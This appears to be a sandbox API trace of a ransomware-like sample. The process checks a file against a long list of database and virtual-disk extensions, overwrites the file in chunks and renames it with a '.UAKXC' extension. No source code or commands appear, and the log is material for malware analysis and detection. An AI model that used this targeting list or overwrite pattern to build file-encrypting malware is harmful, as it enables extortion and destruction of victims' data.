[0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".gdb") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".grdb") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".gwi") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".hdb") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".his") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ib") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".idb") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ihx") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".itdb") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".itw") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".jet") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".jtx") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".kdb") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".kexi") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".kexic") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".kexis") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".lgc") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".lwx") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".maf") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".maq") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mar") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mas") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mav") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mdb") returned 0x0 [0147.802] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mdf") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mpd") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mrg") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mud") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mwb") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".myd") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ndf") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nnt") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nrmlib") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ns2") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ns3") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ns4") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nsf") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nv") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nv2") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nwdb") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nyf") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".odb") returned 0x0 [0147.803] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".oqy") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".orx") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".owc") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".p96") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".p97") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".pan") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".pdb") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".pdm") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".pnz") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".qry") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".qvd") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rbf") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rctd") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rod") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rodx") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rpd") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".rsd") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sas7bdat") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sbf") returned 0x0 [0147.804] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".scx") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sdb") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sdc") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sdf") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sis") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".spq") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sql") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sqlite") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sqlite3") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".sqlitedb") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".te") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".temx") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".tmd") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".tps") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".trc") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".trm") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".udb") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".udl") returned 0x0 [0147.805] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".usr") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".v12") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vis") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vpd") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vvv") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".wdb") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".wmdb") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".wrk") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".xdb") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".xld") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".xmlff") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".abcddb") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".abs") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".abx") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accdw") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".adn") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".db2") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fm5") returned 0x0 [0147.806] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".hjt") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".icg") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".icr") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".kdb") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".lut") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".maw") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mdn") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".mdt") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vdi") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vhd") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmdk") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".pvm") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmem") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmsn") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmsd") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".nvram") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmx") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".raw") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".qcow2") returned 0x0 [0147.807] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".subvol") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".bin") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vsv") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".avhd") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmrs") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vhdx") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".avdx") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".vmcx") returned 0x0 [0147.808] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".iso") returned 0x0 [0147.808] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.808] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.963] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.963] SetEndOfFile (hFile=0x6ec) returned 1 [0148.064] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.064] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x19e60a, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.188] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe619f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.189] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x19e60a, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.197] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x19e60a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.197] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x19e60a, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.455] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe619f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.456] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x19e60a, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.695] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x19e60a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.695] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x19e60a, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.906] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe619f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.906] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x19e60a, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x19e60a, lpOverlapped=0x0) returned 1 [0148.929] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x19e60a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.929] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x19e60a, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x19e60a, lpOverlapped=0x0) returned 1 [0149.012] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe619f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.012] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x19e60a, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x19e60a, lpOverlapped=0x0) returned 1 [0149.180] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x19e60a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.180] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x19e60a, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x19e60a, lpOverlapped=0x0) returned 1 [0149.207] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe619f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.207] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x19e60a, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x19e60a, lpOverlapped=0x0) returned 1 [0149.404] CloseHandle (hObject=0x6ec) returned 1 [0151.072] GetProcessHeap () returned 0xea0000 [0151.072] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0151.073] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0151.073] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.UAKXC" [0151.073] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.uakxc")) returned 1 [0151.074] GetProcessHeap () returned 0xea0000 [0151.074] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, 